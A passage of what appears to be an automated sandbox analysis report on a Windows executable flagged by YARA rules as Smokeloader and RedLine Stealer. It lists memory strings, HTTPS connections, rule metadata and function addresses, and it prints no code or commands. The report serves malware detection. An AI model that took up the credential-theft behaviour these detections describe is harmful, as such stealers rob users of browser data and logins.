Source: IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://www.mozilla.org
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: c4RAHq3BNl.exe, 00000000.00000003.3053946634.000000002F8E3000.00000004.00000020.00020000.00000000.sdmp, IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: c4RAHq3BNl.exe, 00000000.00000003.3053946634.000000002F8E3000.00000004.00000020.00020000.00000000.sdmp, IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: c4RAHq3BNl.exe, 00000000.00000003.3053946634.000000002F8E3000.00000004.00000020.00020000.00000000.sdmp, IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.199.50.2:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.199.50.2:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.5:49763 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3252549703.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3253194154.0000000002D37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3253231068.0000000002D60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C72B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C72B700
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C72B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C72B8C0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C72B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C72B910
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6CF280

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6D5440	0_2_6C6D5440
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C73545C	0_2_6C73545C
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C73542B	0_2_6C73542B
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C705C10	0_2_6C705C10
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C712C10	0_2_6C712C10
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C73AC00	0_2_6C73AC00
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C706CF0	0_2_6C706CF0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6CD4E0	0_2_6C6CD4E0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6D64C0	0_2_6C6D64C0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6ED4D0	0_2_6C6ED4D0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7234A0	0_2_6C7234A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C72C4A0	0_2_6C72C4A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6D6C80	0_2_6C6D6C80
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6DFD00	0_2_6C6DFD00
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6F0512	0_2_6C6F0512
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6EED10	0_2_6C6EED10
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7285F0	0_2_6C7285F0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C700DD0	0_2_6C700DD0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6C35A0	0_2_6C6C35A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C736E63	0_2_6C736E63
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6CC670	0_2_6C6CC670
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C703E50	0_2_6C703E50
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6E4640	0_2_6C6E4640
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6E9E50	0_2_6C6E9E50
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C712E4E	0_2_6C712E4E
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C729E30	0_2_6C729E30
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C707E10	0_2_6C707E10
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C715600	0_2_6C715600
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7376E3	0_2_6C7376E3
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6CBEF0	0_2_6C6CBEF0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6DFEF0	0_2_6C6DFEF0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C724EA0	0_2_6C724EA0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C72E680	0_2_6C72E680
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6E5E90	0_2_6C6E5E90
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C707710	0_2_6C707710
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6D9F00	0_2_6C6D9F00
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6CDFE0	0_2_6C6CDFE0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6F6FF0	0_2_6C6F6FF0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7177A0	0_2_6C7177A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C70F070	0_2_6C70F070
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6E8850	0_2_6C6E8850
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6ED850	0_2_6C6ED850
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C70B820	0_2_6C70B820
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C714820	0_2_6C714820
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6D7810	0_2_6C6D7810
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6EC0E0	0_2_6C6EC0E0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7058E0	0_2_6C7058E0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7350C7	0_2_6C7350C7
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6F60A0	0_2_6C6F60A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C71B970	0_2_6C71B970
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C73B170	0_2_6C73B170
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6DD960	0_2_6C6DD960
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6EA940	0_2_6C6EA940
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6CC9A0	0_2_6C6CC9A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6FD9B0	0_2_6C6FD9B0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C705190	0_2_6C705190
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C722990	0_2_6C722990
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C709A60	0_2_6C709A60
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C70E2F0	0_2_6C70E2F0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6E1AF0	0_2_6C6E1AF0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C708AC0	0_2_6C708AC0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C732AB0	0_2_6C732AB0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6C22A0	0_2_6C6C22A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6F4AA0	0_2_6C6F4AA0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6DCAB0	0_2_6C6DCAB0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C73BA90	0_2_6C73BA90
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6DC370	0_2_6C6DC370
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6C5340	0_2_6C6C5340
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C70D320	0_2_6C70D320
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7353C8	0_2_6C7353C8
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6CF380	0_2_6C6CF380
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C77AC60	0_2_6C77AC60
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C836C00	0_2_6C836C00
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7CECD0	0_2_6C7CECD0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C84AC30	0_2_6C84AC30
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C76ECC0	0_2_6C76ECC0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C806D90	0_2_6C806D90
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8FCDC0	0_2_6C8FCDC0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8F8D20	0_2_6C8F8D20
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C774DB0	0_2_6C774DB0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C89AD50	0_2_6C89AD50
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C83ED70	0_2_6C83ED70
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C810EC0	0_2_6C810EC0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C850E20	0_2_6C850E20
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C77AEC0	0_2_6C77AEC0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7F6E90	0_2_6C7F6E90
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C80EE70	0_2_6C80EE70
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8B8FB0	0_2_6C8B8FB0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7DEF40	0_2_6C7DEF40
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C776F10	0_2_6C776F10
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C84EFF0	0_2_6C84EFF0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C770FE0	0_2_6C770FE0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8B0F20	0_2_6C8B0F20
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C77EFB0	0_2_6C77EFB0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C832F70	0_2_6C832F70
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7C0820	0_2_6C7C0820
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7FA820	0_2_6C7FA820
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8768E0	0_2_6C8768E0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C844840	0_2_6C844840
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7A8960	0_2_6C7A8960
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8009A0	0_2_6C8009A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C82A9A0	0_2_6C82A9A0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8309B0	0_2_6C8309B0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C88C9E0	0_2_6C88C9E0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7C6900	0_2_6C7C6900
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7A49F0	0_2_6C7A49F0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7ECA70	0_2_6C7ECA70
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C81EA00	0_2_6C81EA00
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C828A30	0_2_6C828A30
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7EEA80	0_2_6C7EEA80
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C810BA0	0_2_6C810BA0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C876BE0	0_2_6C876BE0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C89A480	0_2_6C89A480
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C788460	0_2_6C788460
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7FA430	0_2_6C7FA430
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C80A4D0	0_2_6C80A4D0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7D4420	0_2_6C7D4420
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7B64D0	0_2_6C7B64D0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7D2560	0_2_6C7D2560
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7C8540	0_2_6C7C8540
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C83A5E0	0_2_6C83A5E0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7FE5F0	0_2_6C7FE5F0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7645B0	0_2_6C7645B0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C874540	0_2_6C874540
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8B8550	0_2_6C8B8550
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C810570	0_2_6C810570
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7CC650	0_2_6C7CC650
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C80E6E0	0_2_6C80E6E0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7CE6E0	0_2_6C7CE6E0

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: String function: 6C793620 appears 35 times
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: String function: 6C8F09D0 appears 146 times
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: String function: 6C799B10 appears 34 times
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: String function: 6C7094D0 appears 90 times
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: String function: 6C8FDAE0 appears 35 times
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: String function: 6C6FCBE8 appears 134 times

Source: c4RAHq3BNl.exe, 00000000.00000002.3276942673.000000006C752000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs c4RAHq3BNl.exe
Source: c4RAHq3BNl.exe, 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs c4RAHq3BNl.exe

Source: c4RAHq3BNl.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.3252549703.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3253194154.0000000002D37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
